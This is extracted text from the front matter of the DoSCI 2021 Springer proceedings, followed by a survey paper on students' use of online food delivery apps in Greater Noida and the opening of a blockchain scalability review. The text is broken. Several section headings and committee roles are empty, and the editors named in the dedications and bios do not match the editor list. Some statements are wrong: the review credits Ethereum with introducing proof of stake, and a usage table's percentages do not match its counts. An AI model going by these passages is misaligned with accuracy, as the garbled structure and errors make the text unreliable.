Proceedings of Second Doctoral Symposium On Computational Intelligence
Proceedings of Second
Doctoral Symposium
on Computational
Intelligence
DoSCI 2021
Advances in Intelligent Systems and Computing
Volume 1374
Series Editor
Janusz Kacprzyk, Systems Research Institute, Polish Academy of Sciences,
Warsaw, Poland
Advisory Editors
Nikhil R. Pal, Indian Statistical Institute, Kolkata, India
Rafael Bello Perez, Faculty of Mathematics, Physics and Computing,
Universidad Central de Las Villas, Santa Clara, Cuba
Emilio S. Corchado, University of Salamanca, Salamanca, Spain
Hani Hagras, School of Computer Science and Electronic Engineering,
University of Essex, Colchester, UK
László T. Kóczy, Department of Automation, Széchenyi István University,
Gyor, Hungary
Vladik Kreinovich, Department of Computer Science, University of Texas
at El Paso, El Paso, TX, USA
Chin-Teng Lin, Department of Electrical Engineering, National Chiao
Tung University, Hsinchu, Taiwan
Jie Lu, Faculty of Engineering and Information Technology,
University of Technology Sydney, Sydney, NSW, Australia
Patricia Melin, Graduate Program of Computer Science, Tijuana Institute
of Technology, Tijuana, Mexico
Nadia Nedjah, Department of Electronics Engineering, University of Rio de Janeiro,
Rio de Janeiro, Brazil
Ngoc Thanh Nguyen, Faculty of Computer Science and Management,
Wrocław University of Technology, Wrocław, Poland
Jun Wang, Department of Mechanical and Automation Engineering,
The Chinese University of Hong Kong, Shatin, Hong Kong
The series “Advances in Intelligent Systems and Computing” contains publications
on theory, applications, and design methods of Intelligent Systems and Intelligent
Computing. Virtually all disciplines such as engineering, natural sciences, computer
and information science, ICT, economics, business, e-commerce, environment,
healthcare, life science are covered. The list of topics spans all the areas of modern
intelligent systems and computing such as: computational intelligence, soft comput-
ing including neural networks, fuzzy systems, evolutionary computing and the fusion
of these paradigms, social intelligence, ambient intelligence, computational neuro-
science, artificial life, virtual worlds and society, cognitive science and systems,
Perception and Vision, DNA and immune based systems, self-organizing and
adaptive systems, e-Learning and teaching, human-centered and human-centric
computing, recommender systems, intelligent control, robotics and mechatronics
including human-machine teaming, knowledge-based paradigms, learning para-
digms, machine ethics, intelligent data analysis, knowledge management, intelligent
agents, intelligent decision making and support, intelligent network security, trust
management, interactive entertainment, Web intelligence and multimedia.
The publications within “Advances in Intelligent Systems and Computing” are
primarily proceedings of important conferences, symposia and congresses. They
cover significant recent developments in the field, both of a foundational and
applicable character. An important characteristic feature of the series is the short
publication time and world-wide distribution. This permits a rapid and broad
dissemination of research results.
Indexed by DBLP, INSPEC, WTI Frankfurt eG, zbMATH, Japanese Science and
Technology Agency (JST).
All books published in the series are submitted for consideration in Web of Science.
Editors
Deepak Gupta, Department of Computer Science Engineering, Maharaja Agrasen Institute of Technology, Rohini, Delhi, India
Ashish Khanna, Maharaja Agrasen Institute of Technology, Rohini, Delhi, India
Vineet Kansal, Institute of Engineering and Technology, Lucknow, Uttar Pradesh, India
Giancarlo Fortino, University of Calabria, Rende, Cosenza, Italy
© The Editor(s) (if applicable) and The Author(s), under exclusive license to Springer Nature
Singapore Pte Ltd. 2022
This work is subject to copyright. All rights are solely and exclusively licensed by the Publisher, whether
the whole or part of the material is concerned, specifically the rights of translation, reprinting, reuse
of illustrations, recitation, broadcasting, reproduction on microfilms or in any other physical way, and
transmission or information storage and retrieval, electronic adaptation, computer software, or by similar
or dissimilar methodology now known or hereafter developed.
The use of general descriptive names, registered names, trademarks, service marks, etc. in this publication
does not imply, even in the absence of a specific statement, that such names are exempt from the relevant
protective laws and regulations and therefore free for general use.
The publisher, the authors and the editors are safe to assume that the advice and information in this book
are believed to be true and accurate at the date of publication. Neither the publisher nor the authors or
the editors give a warranty, expressed or implied, with respect to the material contained herein or for any
errors or omissions that may have been made. The publisher remains neutral with regard to jurisdictional
claims in published maps and institutional affiliations.
This Springer imprint is published by the registered company Springer Nature Singapore Pte Ltd.
The registered company address is: 152 Beach Road, #21-01/04 Gateway East, Singapore 189721,
Singapore
Dr. Deepak Gupta would like to dedicate this
book to his father Sh. R. K. Gupta and his
mother Smt. Geeta Gupta for their constant
encouragement, and his family members
including his wife, brothers, sisters and kids,
and to his students close to his heart.
Dr. Ashish Khanna would like to dedicate this
book to his mentors Dr. A. K. Singh and
Dr. Abhishek Swaroop for their constant
encouragement and guidance and his family
members including his mother, wife and kids.
He would also like to dedicate this work to
his (late) father Sh. R. C. Khanna with folded
hands for his constant blessings.
Prof. (Dr.) Vineet Kansal would like to
dedicate this book to his father Sh. Vinod
Kumar and his mother late (Smt.) Usha
Gupta.
Prof. (Dr.) Aboul Ella Hassanien would like
to dedicate this book to his wife Nazaha
Hassan.
DoSCI 2021 Steering Committee Members
Chief Patrons
Patrons
General Chairs
Honorary Chairs
Symposium Chairs
Editorial Chairs
Conveners
Publication Chairs
Publicity Chairs
Co-convener
Organizing Chairs
Organizing Team
We are delighted to announce that the Institute of Engineering and Tech-
nology, a constituent college of Dr. A. P. J. Abdul Kalam Technical University,
Lucknow, India, has hosted the eagerly awaited and much coveted Doctoral Sympo-
sium on Computational Intelligence (DoSCI 2021)—An International Conference in
Online Mode. The second edition of the symposium attracted a diverse range
of engineering practitioners, academicians, scholars and industry delegates,
receiving abstracts from more than 1,600 authors from different parts of the
world. The committee of professionals dedicated to the symposium strove to
achieve a high-quality technical program with a track on computational intelli-
gence, an area in which, along with its related sub-areas, a great deal of research
is taking place. More than 400 full-length papers were received, among which
the contributions are focused on theoretical, computer simulation-based research
and laboratory-scale experiments. Among these manuscripts, 74 papers have been
included in the Springer proceedings after a thorough two-stage review and editing
process. All the manuscripts submitted to DoSCI 2021 were peer-reviewed by at least
two independent reviewers, who were provided with a detailed review proforma.
The comments from the reviewers were communicated to the authors, who incorpo-
rated the suggestions in their revised manuscripts. The recommendations from two
reviewers were taken into consideration while selecting a manuscript for inclusion
in the proceedings. The exhaustiveness of the review process is evident, given the
large number of articles received addressing a wide range of research areas. The
stringent review process ensured that each published manuscript met the rigorous
academic and scientific standards. It is an exalting experience to finally see these
elite contributions materialize into a book volume as DoSCI 2021 proceedings by
Springer entitled “Doctoral Symposium on Computational Intelligence.”
DoSCI 2021 invited four keynote speakers, eminent researchers in the field of
computer science and engineering from different parts of the world. In addition
to the plenary sessions on the day of the symposium, nine concurrent technical
sessions were held to accommodate the oral presentation of the 74 accepted
papers. Keynote speakers and session chair(s) for each of the concurrent sessions
were leading researchers from the thematic area of the session. A technical
exhibition was held throughout the day of the symposium, putting on display
the latest technologies, expositions, ideas and presentations. The research part of the
symposium was organized in a total of 16 special sessions. These special sessions
provided the opportunity for researchers conducting research in specific areas to
present their results in a more focused environment.
An international symposium of such magnitude and release of the DoSCI 2021
proceedings by Springer has been the remarkable outcome of the untiring efforts
of the entire organizing team. The success of an event undoubtedly involves the
painstaking efforts of several contributors at different stages, dictated by their devo-
tion and sincerity. Fortunately, since the beginning of its journey, DoSCI 2021 has
received support and contributions from every corner. We thank them all who have
wished the best for DoSCI 2021 and contributed by any means toward its success.
The edited proceedings volume by Springer would not have been possible without the
perseverance of all the steering, advisory and technical program committee members.
The organizers of DoSCI 2021 thank all the contributing authors for their
interest and exceptional articles. We would also like to thank the authors of the
papers for adhering to the time schedule and for incorporating the review comments.
We wish to extend our heartfelt acknowledgment to the authors, peer-reviewers,
committee members and production staff whose diligent work put shape to the DoSCI
2021 proceedings. We especially want to thank our dedicated team of peer-reviewers
who volunteered for the arduous and tedious step of quality checking and critique on
the submitted manuscripts. We wish to thank our faculty colleagues Mr. Moolchand
Sharma and Ms. Prerna Sharma for extending their enormous assistance during the
symposium. The time spent by them and the midnight oil burnt is greatly appreciated,
for which we will ever remain indebted. The management, faculties, administrative
and support staff of the college have always extended their services whenever
needed, for which we remain thankful.
Lastly, we would like to thank Springer for accepting our proposal for publishing
the DoSCI 2021 symposium proceedings. The help received from Mr. Aninda Bose,
Senior Acquisitions Editor, in the process has been very useful.
Dr. Deepak Gupta is an eminent academician who juggles versatile roles and respon-
sibilities spanning lectures, research, publications, consultancy, community service,
and Ph.D. and post-doctoral supervision. With 13 years of rich experience in
teaching and two years in industry, he focuses on rational and practical learning.
He has contributed extensively to the literature in the fields of human–computer
interaction, intelligent data analysis, nature-inspired computing, machine learning
and soft computing. He is working as an Assistant Professor at Maharaja Agrasen Institute of
Technology (GGSIPU), Delhi, India. He has served as Editor-in-Chief, Guest Editor
and Associate Editor for SCI-indexed and various other reputed journals. He has authored/edited
44 books with national/international publishers. He has published 140 scientific
research papers in reputed international journals and conferences, including 68 in
SCI-indexed journals. He has also filed three patents.
Prof. (Dr.) Vineet Kansal studied at Indian Institute of Technology, Delhi, and
is currently working as Professor with Institute of Engineering & Technology,
Dr. A. P. J. Abdul Kalam Technical University, Lucknow. He was awarded appreciation
by NPTEL, IIT Kanpur and the Centre for Continuing Education, IIT Kanpur
for inspiring the faculty members and students of higher technical education to
adopt NPTEL online certification courses, for evangelizing its modus operandi, and
for conceptualizing online and offline blended faculty training programs addressing
pedagogical issues in engineering education in the state of Uttar Pradesh, India.
Prof. (Dr.) Aboul Ella Hassanien is Founder and Head of the Egyptian Scientific
Research Group (SRGE). Hassanien has more than 1000 scientific research papers
published in prestigious international journals and over 50 books covering such
diverse topics as data mining, medical images, intelligent systems, social networks
and smart environment. Prof. Hassanien has won several awards, including the Best
Researcher of the Youth Award of the National Research Institute of Astronomy
and Geophysics, Academy of Scientific Research (Egypt, 1990). He was also
granted the Scientific Excellence Award in Humanities from the University of Kuwait
in 2004 and received the University Award for Scientific Superiority (Cairo
University, 2013). He was also honored in Egypt as the best researcher at
Cairo University in 2013. He has also received the Islamic Educational, Scientific
and Cultural Organization (ISESCO) prize on Technology (2014) and received the
State Award for Excellence in Engineering Sciences 2015.
Investigation of Consumer Perception
Toward Digital Means of Food Ordering
Services
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 1
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_1
2 A. Srivastava et al.
collected from all the users in Greater Noida who are using the online food ordering
apps and delivery services. Four parameters have been taken into consideration
for the positioning study (perceptual mapping) analysis.
1 Introduction
The views of people regarding the online purchase of food are changing very fast.
E-commerce and e-businesses, with their technological advantage, offer hassle-free
and quick food delivery to consumers [5]. In today's age of advanced information
technology, consumer perception is being molded into an affirmation of online
food delivery.
Indians have embraced the new trend of app-based food delivery, available at the
convenience of their fingertips [6]. One explanation for this trend may be time
constraints and the hectic corporate lifestyle, which have given a boost to online
food delivery services, along with the comfort of ordering food from a variety of
restaurants on a mobile phone (Figs. 1 and 2).
2 Literature Review
Sethu and Saini (2016), in their paper titled “Customer Perception and Satis-
faction on Ordering Food via Internet” (with special reference to Manipal Univer-
sity), highlighted that online ordering of food saves a lot of time, thereby helping
Fig. 1 Segment overview: global segment sizes. Source Statista Digital Market Outlook (2018)
the scholars to manage their time proficiently [8]. Researchers and students
have the option to order their preferred food from a preferred location at a
preferred time. Furthermore, the study reveals that almost all the respondents use
the Internet on their phones or computers, and a significant proportion of the
respondents ordered twice or a minimum of once per week. Recently, some
researchers have also found that the Web environment offers good opportunities
for interactive and individualized selling (Burke, 2002; Wind & Rangaswamy,
2001): compared with the offline environment, the online environment offers
more opportunities for personalized and interactive marketing. Furthermore, Phau
and Lo (2004) state that the Internet also offers an impulsive shopping channel to consumers.
Consumers can now effortlessly search the Web for various competing sellers and
products that match their expectations (Singh, 2002). Social media also plays a
role in purchase decisions. Consumers receive input and feedback from family,
friends, and peers via various social media channels such as Instagram, public
forums, Facebook, blogs, and Twitter (Herring et al., 2005; Bernoff & Li, 2008).
Web site quality is also considered an important cue for customer satisfaction [9].
In the last decade, therefore, the literature on Web sites has witnessed a drastic
change, as Web site quality serves as an important factor driving purchase intention.
Many factors are taken into consideration to improve Web site quality. Some of
the important ones include customization, cultivation, choice, interactivity, care,
character, community, convenience, and user-friendliness (Srinivasan et al., 2002);
Huang (2003) also added complexity, novelty, and interactivity. Furthermore,
according to Wirtz and Lihotzky (2003), factors like technical integration,
individualization, free services, convenience, and community also play important
roles. Data quality, interactivity, learning, connectivity, and playfulness (Chiu et al.,
2005); quality of content, appearance, technical adequacy, and specific content (Liao
et al., 2006); communication, design, promotion, merchandising, privacy/security,
and order fulfillment (Jin & Park, 2006); and user-friendliness, content quality,
transaction speed, and security (Shih & Fang, 2006) have all been emphasized as
essential aspects for generating traffic on a Web site.
Other researchers are of the view that system quality, information quality, and
service quality are the three Web site merits expected by customers to assist
them in their online encounters (Shih, 2004).
Additionally, in the online business environment, the Web site design is considered
to be an important factor (Marcus & Gould, 2000), and therefore, the designs by the
businesses are adapted to suit the local values and norms (Gommans et al. 2001).
Security and trust are crucial factors for buyers who intend to purchase products
online directly from shopping Web sites. For this reason, security is
considered as one of the primary concerns by consumers who are buying online
products (Flavian et al., 2006). Furthermore, the perceived confidentiality and
security features of Web sites are important antecedents of trust, which are
responsible for influencing the behavioral intention of consumers (Mukherjee
& Nath, 2007). Therefore, in most studies, the security and privacy of the Web
portals of e-commerce companies (e-service providers) are among the primary
concerns addressed on priority by these companies (Sathye, 1999; Liao
& Cheung, 2002; Poon, 2008). Confidentiality, in particular, is considered to be an
important element for creating an online belief and trust in any service organization.
Garrett (2003) clearly puts forth the concept of Web site design as something that
deals with emotional appeal, aesthetics, uniformity, poise, mix of colors, shapes,
photography, and font style. A few studies (Karvonen, 2000) suggest an association
between trust and the aesthetic beauty of Web sites, and others (Wang
& Emurian, 2005) found a noteworthy association between the two. In fact, most
empirical studies have shown a positive stance (Tarasewich, 2003) when it comes
to the relationship between Web site aesthetics and an enjoyable user experience.
Chen and Chang (2003) state that online shoppers have a very low tolerance for
slow system feedback. Yet another study says online buyers wait only a few seconds
(eight seconds) before they leave a Web site (Dellaert & Khan, 1999). As per
Weinberg (2000), factors like loading time, appearance, and functionality are very
important for any webpage. The Web site design should be trustworthy and
user-friendly, and it should save consumers' transaction time. Consumers may not
use the online payment system of a portal if it loads slowly or the design is
not trustworthy. If the Web site of the e-service provider is designed to serve the
purpose of a salesperson, in that case, the Web site should also focus on certain
skills and qualities of salespersons like expertise, likeability, and strong trust (Hawes
et al., 1989; Doney & Cannon, 1997) as these characteristics are surely linked with
trust of the consumer in the salesperson and the company. It may be noted that Web
site design, information quality, security/privacy, and the payment system of an
online food ordering Web site play a role in determining customers' trust in their
online shopping experiences.
The factor that plays a significant role in generating customer satisfaction is service
quality. To measure loyalty and customer satisfaction, organizations also use
another important tool, the service quality dimensions (SERVQUAL) instrument
(Landrum et al., 2009). The concept of service quality dimensions was introduced
by Parasuraman et al. in 1988. It is basically a generic instrument used for the
measurement of service quality based on focus group inputs. The concept has also been adopted by
many organizations like Web services and libraries (Gede & Sumaedi, 2013; Reichl,
Tuffin & Schatz, 2013; Wang et al., 2014) [10]. According to Juran and Godfrey
(1999), quality is defined as “fitness for use” and “those product features which meet
customer needs and thereby provide customer satisfaction”. However, the definition
of quality may vary depending on the approach taken: transcendent, value-based,
manufacturing-based, product-based, or user-based (Garvin, 1984). Rolland
and Freeman (2010) have included the following factors in the concept of service
quality: purchasing of products and services, Web site facilitating effective and effi-
cient shopping, and the type of customer service delivered right from first contact to
fulfillment of the services. Moreover, according to Juga et al. (2010), service
perceptions influence loyalty, while Oliver (1997) believes that satisfaction
represents a more general evaluative construct than the episodic and
transaction-specific nature of service performance, one that mediates the link
between service quality and a customer's re-purchase loyalty (Olsen, 2002).
Providing excellent service to consumers is
the key sustainable strategy for e-commerce and online food delivery companies.
Therefore, online food delivery companies focus more on the perceived quality
of the service, as the good quality service always has a larger impact on customer
satisfaction.
On the basis of the above discussion, three major dimensions have been
recognized as crucial for retaining and satisfying consumers: delivery, quality of
food, and customer service.
2.5 Delivery
3 Scope of Study
The most important aim of this study, as mentioned above, is to understand
consumer perception of online food delivery and ordering services in Greater
Noida. The study will help us understand the “Online Food Ordering and
Delivery Service Market”. With this study, we will understand the consumer
perception and key success factors regarding the services various companies provide
in Greater Noida.
Consequently, the findings of this study may also be useful for online food
delivery companies (online service providers), which, after analyzing the results,
can work on these variables and try to fill the gaps in the minds of consumers.
4 Research Methodology
Primary data sources of this study include information collected and processed
directly by the researchers, through questionnaire based on perception of customers
and key success factors for usage of online food delivery apps in Greater Noida.
Secondary data collection includes information from various apps, Internet, jour-
nals, magazines, and research reports. Investigation and observation of the collected
data were done with the help of computational, mathematical, and statistical tools and
techniques. A well-designed and structured questionnaire with both open-ended and
close-ended questions was prepared.
Questionnaire: Section I of the questionnaire had relevant questions related to
demographic factors like gender, age, and university/college of the students who
willingly agreed to fill in the form.
Second section of the questionnaire sheds light on the questions about students’
experience while ordering online food and about the factors affecting their buying
behavior.
Sample Size: 216 respondents (Students).
Research Tools: Following are the research tools which are used to draw conclusions
and to do analysis.
• Cronbach's alpha
• Chi-square test
• Weighted average
• Descriptive analysis: multi-item scales (five-point, Likert-type) ranging from
strongly agree (5) to strongly disagree (1) were used.
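As an illustration of the weighted-average tool listed above, the sketch below (not the authors' code; the response counts are hypothetical example data) computes the weighted average of a single five-point Likert item:

```python
# Hypothetical example data: counts[score] = number of respondents who
# chose that score on a five-point Likert item (5 = strongly agree).
counts = {5: 80, 4: 60, 3: 40, 2: 25, 1: 11}  # 216 respondents in total

total_respondents = sum(counts.values())
# Each response is weighted by its scale value, then averaged.
weighted_average = sum(score * n for score, n in counts.items()) / total_respondents
print(round(weighted_average, 2))  # → 3.8
```

A value close to 5 indicates broadly positive responses on the item; the same computation is applied per item across the questionnaire.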
Sampling:
Survey was conducted in four technical and management institutes in Greater Noida.
Non-probability: Convenience sampling method was used.
Hypothesis: H0: No internal consistency exists among the four factors considered
for the usage of online food delivery app.
H1: There exists an internal consistency among the four factors considered for
the usage of online food delivery app.
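To make the internal-consistency hypothesis concrete, the sketch below shows how Cronbach's alpha can be computed; this is not the authors' code, and the response matrix is hypothetical example data rather than the study's dataset:

```python
import numpy as np

def cronbach_alpha(items: np.ndarray) -> float:
    """Cronbach's alpha for a response matrix of shape (n_respondents, n_items)."""
    k = items.shape[1]
    item_vars = items.var(axis=0, ddof=1)      # variance of each item
    total_var = items.sum(axis=1).var(ddof=1)  # variance of the summed scores
    return (k / (k - 1)) * (1 - item_vars.sum() / total_var)

# Hypothetical five-point Likert responses on the four factors
# (user-friendly app, 24*7 availability, mode of payment, discount offered).
responses = np.array([
    [5, 4, 5, 4],
    [4, 4, 4, 3],
    [3, 3, 2, 3],
    [5, 5, 5, 5],
    [2, 2, 3, 2],
    [4, 3, 4, 4],
])
alpha = cronbach_alpha(responses)
print(round(alpha, 3))
```

An alpha above roughly 0.7 is conventionally read as acceptable internal consistency, which is why a reported value such as 0.852 supports rejecting H0 in favor of H1.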
Table 1 is presented to understand the behavior of students about the use of online
food delivery apps, and socioeconomic characteristics of the consumers were studied.
These variables are taken into consideration as they affect the consumption pattern
and consumer behavior regarding the usage of food delivery apps. Students were
asked to fill the questionnaire. The demographic profile of the respondents is
represented in the following table.
Users—Food delivery and ordering services apps (Graph 1; Fig. 3):
Interpretation: Analysis of the data shows that 87% of the respondents were using
online apps for ordering food. Of the 216 respondents in total, 189 were using
the online services, while 27 respondents (13%) revealed that they are not keen
on using the online services for food delivery.
Interpretation:
The above analysis clearly depicts that Zomato has a strong position in terms of
“Availability of Restaurants” and “Highest Speed of Delivery” in Greater Noida.
Swiggy's position is good on both parameters. Food Panda is positioned well on
delivery, but its position on discounts is average. Uber Eats needs to evolve in
this area, as Zomato, Swiggy, and Food Panda are the prominent players in the
market in Greater Noida.
Usage of Apps   Number   Percentage (%)
Zomato          127      68
Food Panda       32      17
Swiggy           25      14
Uber Eats         5       1
Total           189      100
Conclusion from the above analysis: Zomato is clearly the most preferred app,
followed by Food Panda and Swiggy.
Interpretation:
From the above graph, we can see that for Zomato, the user-friendly app is the
major factor influencing usage, followed by 24*7 availability. For Food Panda,
customers prefer the app for the discounts offered, beyond its user-friendliness
and 24*7 availability (Graph 2).
Chi-squared test between factors:
Four factors considered during analysis are as follows:
Graph 2 Major factors and its effect on the usage of food delivery apps
• User-friendly app
• 24*7 availability
• Mode of payment
• Discount offered.
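As a sketch of how a chi-squared test of independence between these factors and app usage might look (this is not the authors' analysis, and the contingency table below is hypothetical), the statistic can be computed from observed and expected counts:

```python
def chi_square(observed):
    """Chi-squared statistic and degrees of freedom for a contingency table."""
    row_totals = [sum(row) for row in observed]
    col_totals = [sum(col) for col in zip(*observed)]
    grand_total = sum(row_totals)
    stat = 0.0
    for i, row in enumerate(observed):
        for j, obs in enumerate(row):
            expected = row_totals[i] * col_totals[j] / grand_total
            stat += (obs - expected) ** 2 / expected
    dof = (len(observed) - 1) * (len(observed[0]) - 1)
    return stat, dof

# Rows: Zomato, Food Panda, Swiggy, Uber Eats (hypothetical counts).
# Columns: user-friendly app, 24*7 availability, mode of payment, discount offered.
observed = [
    [52, 38, 22, 15],
    [8, 6, 4, 14],
    [9, 7, 5, 4],
    [1, 2, 1, 1],
]
stat, dof = chi_square(observed)
print(f"chi-square = {stat:.2f}, dof = {dof}")
```

The statistic is then compared against the chi-squared critical value for the computed degrees of freedom (16.92 for dof = 9 at the 0.05 level); scipy.stats.chi2_contingency performs the same computation and also returns the p-value.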
Reliability test

Cronbach's alpha   Cronbach's alpha based on the given items   Number of items (N)
0.852              0.851                                       4
The scale has an alpha coefficient of 0.852, which suggests relatively high
internal consistency among the four factors.
Findings
• Zomato has a strong position in the minds of consumers on the factors of
“Speed of Delivery” and “No. of Restaurants Available”. The strong perception of
its speed of delivery is the reason why the majority of respondents choose
Zomato over the other apps in Greater Noida.
• Swiggy and Food Panda do not have clear positioning around these factors. They
can position themselves on another factor, such as “Discounts Offered”, where
Zomato is not the preferred choice.
• Uber Eats needs to work hard to expand its market in the Greater Noida region
and achieve better responses in the near future.
• Zomato is the preferred choice when it comes to online food delivery followed
by Swiggy and Food Panda.
• Consumers prefer Zomato because of its user-friendly app, 24*7 availability,
and easy mode of payment.
6 Conclusion
References
1. Mustafa, A. B., Balihallimath, H., Bidichandani, N., & Khond, P. M. (2016). Growth of food
tech: A comparative study of aggregator food delivery services in India. In Proceedings of
the 2016 International Conference on Industrial Engineering and Operations Management
Detroit, Michigan, USA, September 23–25, 2016.
2. PTI. (2019, April 1). Zomato expands food delivery business to 213 cities across India.
Economics Times. Retrieved from https://economictimes.indiatimes.com/small-biz/startups/
newsbuzz/zomato-expands-food-delivery-business-to-213-cities-across-india/articleshow/
68672719.cms
3. Van Alstyne, M. W., Parker, G. G., & Choudary, S. P. (2016). Pipelines, platforms, and the new
rules of strategy. Harvard Business Review, April 2016, 4–6.
4. The online food ordering market in India is likely to grow at over 16 per cent annually to
touch USD 17.02 billion by 2023. Business Standard. Retrieved from https://www.business-
standard.com/article/pti-stories/online-food-ordering-market-may-grow-at-over-16-pc-likely-
to-touch-usd-2023
5. Thyagaraja, G. (2015). Zomato—A case study. International Journal of Business and
Administration Research Review, 3(11), 157–160.
6. Gupta, M. (2019). A study on impact of online food delivery app on Restaurant Business special
reference to Zomato and Swiggy. Retrieved from http://ijrar.com/upload_issue/ijrar_issue_205
42895.pdf
7. McKinsey & Company. (2016). The changing market for food delivery. Retrieved from https://
www.mckinsey.com/industries/high-tech/our-insights/the-changing-market-for-food-delivery
8. Sethu, H. S., & Saini, B. (2016). Customer perception and satisfaction on ordering food via
internet, a case on Foodzoned.Com, in Manipal. In Proceedings of the Seventh Asia-Pacific
Conference on Global Business, Economics, Finance and Social Sciences (AP16Malaysia
Conference), ISBN: 978-1-943579-81-5, Kuala Lumpur, Malaysia, 15–17 July 2016. Paper
ID: KL631.
9. Bhargave, A., Jadhav, N., Joshi, A., Oke, P., & Lahane, S. R. (2013). Digital ordering system
for Restaurant using Android. International Journal of Scientific and Research Publications,
3(4), April 2013.
10. Gede, M.Y.B.I., & Sumaedi, S. (2013). An analysis of library customer loyalty: The role of
service quality and customer satisfaction, a case study in Indonesia. Library Management,
34(6/7), 397–414.
11. Rathore, S., & Chaudhary, M. (2018). Consumer perception on online food ordering.
International Journal of Management & Business Studies, 8(4), Oct–Dec 2018, 12–17.
12. Dholakia, R.R., & Zhao, M. (2010). Retail web site interactivity: how does it influence customer
satisfaction and behavioural intentions?. International Journal of Retail & Distribution
Management, 37(10), 821–838.
13. Barutçu, S. (2010). E-Customer satisfaction in the e-tailing industry: an empirical survey for
turkish e-customers. Ege Akademik Bakis (Ege Academic Review), 10(1), 15–15.
14. Qin, H., Prybutok, V. R., & Zhao, Q. (2010). Perceived service quality in fast-food restaurants:
Empirical evidence from China. International Journal of Quality & Reliability Management,
27(4), 424–437.
A Systematic Review of Blockchain Technology to Find Current Scalability Issues and Solutions
Abstract Blockchain technology has proven the success of its security model and the need for transaction transparency in the present era. This paper presents an in-depth review of existing blockchain technologies and their issues: limited throughput, high latency, storage constraints, and so on. Blockchain technology has different variants with different consensus mechanisms, methods, and techniques, each with its own advantages and limitations. In this review, we also study the existing solutions to the scalability challenge. A large number of blockchain scalability solutions exist, but overcoming the challenge completely requires further research and more scalability solutions.
1 Introduction
Bitcoin, the first application of blockchain technology, is a platform based on a peer-to-peer network architecture, used for exchanging cryptocurrency without a third party, which provides an effective solution to the double-spending problem. In this decentralized network, bitcoin adopted the proof-of-work (PoW) consensus mechanism for the verification of new transactions and blocks [1]. Many digital currencies appeared before bitcoin, but they came with challenges and never became as popular. Digital currencies in their initial phase had many problems, and among them the most serious was the double-spending problem. Satoshi Nakamoto settled this problem by using a peer-to-peer distributed network and a computational mechanism that generates a proof of every transaction which can never be changed and remains
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_2
B. K. Chauhan and D. B. Patel
in the chain forever. Each transaction has two requirements for completion: a digitally signed hash of the previous transaction and the public key of the next owner. A state transition system is used in the bitcoin ledger to preserve the ownership status of existing bitcoins, where the new state is the output of the state transition function. Each transaction contains an input hash and an output hash, and the output hash of a transaction can be used only once as an input in the entire blockchain. If the output of a transaction has not been referenced before, it is called an unspent transaction output (UTXO), and a referenced transaction is called a spent transaction output (STXO). Bitcoin introduced proof of work (incrementing a nonce to produce a valid block hash) based on the SHA-256 hash algorithm for the verification of transactions. A bitcoin block stores a Merkle tree of the transaction hashes [2]. Ethereum is a modified and improved blockchain platform that followed bitcoin. It is an open-source platform on which different ecosystems can build decentralized applications, and it brought the unique and special qualities of blockchain technology to the wider technology world. It introduced the proof-of-stake (PoS) consensus mechanism, which is more efficient and lower cost than the PoW used in bitcoin. Ethereum created the smart contract concept: a contract contains a description of rules that reside on the blockchain and is executed only if the rules prescribed in it are satisfied. The Ethereum virtual machine (EVM) executes all smart contracts, and no changes are possible after a smart contract has been accepted by the blockchain. The Ethereum platform uses Ether as its currency. Transaction verification takes place through a consensus mechanism that modified the Greedy Heaviest Observed Subtree (GHOST) protocol and uses the Keccak 256-bit hash algorithm [2, 3].
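The nonce-incrementing proof of work described above can be sketched in a few lines. This is a minimal illustration, not bitcoin's actual encoding: the header string and the leading-zeros difficulty rule are simplified stand-ins for the real block format and target comparison.

```python
import hashlib

def mine(block_header: str, difficulty: int) -> tuple[int, str]:
    """Increment a nonce until SHA-256(header + nonce) starts with
    `difficulty` hex zeros -- the core loop of bitcoin-style proof of work."""
    nonce = 0
    target = "0" * difficulty
    while True:
        digest = hashlib.sha256(f"{block_header}{nonce}".encode()).hexdigest()
        if digest.startswith(target):
            return nonce, digest
        nonce += 1

# Any node can re-verify the proof with a single hash computation.
nonce, digest = mine("prev_hash|merkle_root|timestamp", difficulty=4)
print(nonce, digest)  # digest begins with four hex zeros
```

Verification is cheap (one hash) while finding the nonce is expensive, which is exactly the asymmetry PoW relies on.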
Blockchain technology has the power to bring transparency to procedures ranging from buying and selling fresh vegetables to interaction with the government, with a consensus mechanism used to verify authenticity. Blockchain records are stored in a ledger using cryptographic methods, making them traceable and tamper-free [4]. The technology is not limited to cryptocurrency; it has reshaped the technology world with its specific features and can convert existing centralized systems into more accurate, secure, and decentralized ones [5]. Its unique qualities, cryptographic security, transparency, anonymity, auditability, and data integrity without any third party, create strong research interest. Yet it has not grown as it should have, because of technical and legal limitations: limited scalability, high latency, storage constraints, limited consensus mechanisms, lack of governance, high energy consumption, inadequate tooling, and the threat of quantum computing [6–8]. Bitcoin and smart contracts are the first two innovations of blockchain technology but can process only a limited number of transactions, and "blockchain scaling" is regarded as the third innovation [9]. Blockchain technology has three generations: Blockchain 1.0 (bitcoin), Blockchain 2.0 (Ethereum), and Blockchain 3.0 (which tries to solve the challenges of blockchain with different solution techniques) [10]. Decentralization, security, and scalability are the three pillars of blockchain technology and together form the blockchain trilemma; scalability is the pillar that most affects the growth of the technology [11]. Bitcoin and Ethereum process a limited number of transactions, but their popularity has increased because of their unique features. After bitcoin and Ethereum, the next generation is trying to solve the limitations of blockchain technology.
